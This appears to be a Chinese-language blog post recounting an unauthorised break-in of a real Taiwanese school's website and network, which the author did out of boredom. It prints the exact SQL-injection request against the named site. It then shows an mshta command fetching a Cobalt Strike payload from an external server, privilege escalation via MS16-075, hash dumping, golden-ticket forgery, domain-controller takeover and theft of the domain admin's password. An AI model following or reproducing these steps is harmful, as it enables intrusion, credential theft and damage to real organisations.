在家无聊,找了个湾湾的站点练了练手

侦查

目标站:www.wgps.tp.edu.tw

脆弱点:http://www.wgps.tp.edu.tw/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp

SQL注入POST包:

POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1
Host: www.wgps.tp.edu.tw
Content-Length: 31
Cache-Control: max-age=0
Origin: http://www.wgps.tp.edu.tw
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://www.wgps.tp.edu.tw/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBB
Connection: close

txtSchoolYear=108B&txtStdID=1234

权限:DBA(SA)

image-20200330125321952

内网横向

CS设置好HTTPS监听器,生成一个html application文件

image-20200330125601300

image-20200330125613918

然后传到CS服务器上

image-20200330125642729

sqlmapos-shell下执行mshta http://207.*.*.201:80/download/file.txt

image-20200330125750496

过一会有台主机上线了

image-20200330125811634

设置好beacon回连时间后检查下服务器的环境

image-20200330125917715

存在域

image-20200330125959919

image-20200330132104021

image-20200330132158944

补丁安装的较多

image-20200330130029579

复制信息到https://bugs.hacking8.com/tiquan/检查下有没有漏补的

发现漏补MS16-075

image-20200330130204077

github上找到了该expcna插件https://github.com/vysecurity/reflectivepotato.git

clone回来加载到CS里

image-20200330130926263

获取到了system权限的beacon

image-20200330131040492

需要注意的是目前进程的父进程是mssql,需要注入到其他用户的进程下,否则执行一些命令时会提示权限不够

image-20200330131214372

选择了WEGO的用户注入

image-20200330131326437

image-20200330131651646

查看域控

image-20200330132320148

image-20200330132412404

根据备注,判断AD1为主域控,AD2AD3为辅域控

image-20200330133255329

抓下hash然后备用

image-20200330133103916

接管域控

利用抓到的hash伪造金票

image-20200330133038332

然后接管AD1

image-20200330133159571

image-20200330133307791

再从AD1上抓hash

image-20200330133408775

在AD1上抓到了域管的明文密码

image-20200330133535059

然后批量梭哈

image-20200330133628792

拿下运维机

image-20200330145617198

image-20200330135252056